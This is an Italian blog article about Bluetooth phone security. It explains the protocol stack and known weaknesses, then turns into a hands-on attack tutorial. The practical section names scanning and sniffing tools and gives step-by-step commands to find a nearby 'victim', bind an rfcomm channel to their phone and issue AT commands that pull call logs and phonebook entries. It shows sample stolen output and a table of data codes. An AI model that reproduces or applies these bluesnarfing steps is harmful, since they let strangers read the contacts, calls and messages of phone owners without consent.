Adamantio.net - Bluetooth! C'è da fidarsi?

Scritto da criptex :
Ormai, guardando le vetrine dei negozi di telefonia, si nota sempre di più la presenza sui telefonini di nuove tecnologie di comunicazione; all'inizio ci fu la "famosa" porta ad infrarossi che resiste tuttora ma non permette un grande mobilità del'apparecchio che deve necessariamente "guardare" laltro dispositivo per poter comunicare!
Ecco che allora nasce il BLUETOOTH (ovvero Dente Blu... Mah!).

Con questa nuova tecnologia, ora si possono fare tutte le cose che permette la porta infrarossi (IRDA) e anche di più; come navigare con il proprio computer usando il telefonino, scambiarsi messaggi con gli altri dispositivi, trasferire dati ecc..
Attualmente questa tecnologia è molto diffusa e per verificarlo basta farsi una passeggiata in una stazione ferroviaria con un notebook o u telefonino (come il miofedele nokia 6600) con installato uno scanner bluetooth!
Ora la domanda è: il bluetooth è realmente così sicuro comedicono da poter girare tranquilli con il dispositivo acceso?
La risposta: NOOO!
Per spiegarvi il perchè, devo spiegare anche il funzionamento dello stack in questione.
Nel bluetooth, ci sono due tipi di protocollo: di trasporto e di middleware.
TRASPORTO:
Radio:E' la parte più fisica dello stack e definisce la trasmissione radio vera e propria che viaggia ad una frequenza di 2.4GHZ e che fa uso del frequency hopping per annullare eventuali altre trasmissioni nelle vicinanze. I dispositivi bluetooth possono essere di prima(100 Mt), seconda e terza categoria.

Baseband: E' il servizio che si occupa della sincronizzazione dei dispositivi

LMP(Link Manager Protocol): consente la verifica periodica dell'esistenza del dispositivo remoto.

HCI(Host Controller Interface): E' un layer che fa da tramite per accedere agli strati piùbassi dello stack

L2CAP: ridimensiona e frammenta i pacchetti da spedire

MIDDLEWARE:
RFCOMM: E' un emulatore del cavetto che usavamo per collegare il nostro pc al telefonino

SDP: E' un servizio che permette di trovare i servizi offerti dal dispositivo remoto.

TCS: permette di poter usare i comandi AT che si usano peri modem. Sarebbe inutilizzabile senza l'RFCOMM.

Inoltre vi sono anche altri protocolli ma a noi non interessano!

Le vulnerabilità principali del Bluetooth riguardano l'autenticazione. Infatti questa si basa su 3 variabili: Un numero casuale, il PIN e la lunghezza del PIN. Visto che il numero casuale viaggia in chiaro, non rimane che trovare il PIN con metodo forza bruta.
Un altra vulnerabilità riguarda il clock che può essere facilmente disturbato con un laser a bassa frequenza che causerà un DOS (Denial Of Service).

Detto ciò passiamo alla parte più pratica dell'articolo, la tecnica!
Esistono vari tipi di attacco ad un dispositivo bluetooth e variano di difficoltà e pericolosità; vi elenco i più diffusi:

Bluejacking: Decisamente quello meno pericoloso che permette di inviare un messaggio anonimo senza necessità di autenticazione. Può essere fatto inviando con il proprio telefonino un contatto nel cui campo nome vi è il testo del messaggio.

Bluediscovery: Il dispositivo bluetooth può avere tre stati: acceso, nascosto, spento. La maggior parte delle persone crede di essere al sicuro mettendo lo stato di nascosto... sappiate che non è così. Infatti basta trovare il MAC address che solitamente ha un formato del genere 00:01:23:45:67:89. Sapendo che i primo 4 caratteri dell'indirizzo sono fissi per ogni produttore, si può tentare un attacco forza bruta (se abbiamo un notebook con 4 adattatori bluetooth il tempo si riduce di molto)

Bluesnarfing: E' quello più pericoloso perché permette di accedere completamente a tutti i dati contenuti nel telefonino/palmare, come chiamate effettuate, numeri di telefono, foto, sms, mms, ecc..
Tutti direte "Nooo non è possibile"! E invece si!

L'occorrente per provare questi attacchi sono:

Un computer (meglio se un notebook) con un adattatore bluetooth di classe 1 ovvero con un raggio di 100 Mt
Linux
Tutti i pacchetti BLUEZ (bluez-libs, bluez-utils, sdp, rfcomm, hci, bluez-pin, ecc..)
e i seguenti tool:
Btscanner (uno scanner bluetooth dalle molteplici funzioni)
Bluesniff (uno sniffig bluetooth)
Redfang (un tool che trova i dispositivi "nascosti")

Allora, pronti? Cominciamo!
Per attivare il bluetooth sul computer digitiamo:
hci-config -a hci0 up
dove hci0 può variare a seconda di dove si mette il bluetooth.

Per trovare i dispositivi nelle vicinanze digitiamo:
hcitool scan
e ci restituirà il nome e l'indirizzo del dispositivo vittima

Ora che abbiamo l'indirizzo possiamo cominciare con l'attacco;
mknod /dev/rfcomm0 c 216 0
rfcomm -i hci0 bind 00:01:23:45:67:89 17
con questi comandi abbiamo creato un dispositivo (dev/rfcomm0) sul nostro computer che utilizzeremo per agganciarci al canale 17 (phonebooking) della nostra vittima.
Fatto questo impostiamo minicom sulla porta rfcomm0 e apriamo il terminale minicom.
Ora basta conoscere un po' i comandi AT per avere in pugno la nostra vittima:

AT+CGMI
ericsson --ecco il produttore

AT+CGMN
12345-f5g47 --ecco il modello

AT+CPBS="DC" --chiamate effettuate
AT+CPBR=4
+CPBR: 4, "3281234567", 85, "nome contatto", "11/12/2004 22.00"

questo è solo un esempio di quello che si può fare con i comandi AT ma con questo elenco potrete fare molte più prove:
DC ME Chiamate effettuate
EN SIM numeri di emergenza
LD Ultime chiamate
MC Chiamate perse
ME ME telefono phonebook
MT ME+SIM
ON Proprio numero
RC chiamate ricevute
TA TA phonebook

Per ulteriori informazioni e per i tool che vi ho citato ecco i links:
http://www.bluejack.it
http://www.bluetooth.com
http://www.bluejackhq.com
http://www.betaversion.net/btdsd/
http://www.bluestumbler.org
http://sourceforge.net/projects/bluez/
http://www.atstake.com/research/tools/info_gathering/#redfang

Per ulteriori informazioni inviatemi un messaggio
La prossima volta che andrete in giro con il bluetooth acceso ricordatevi di me!
Ciaoo! :-D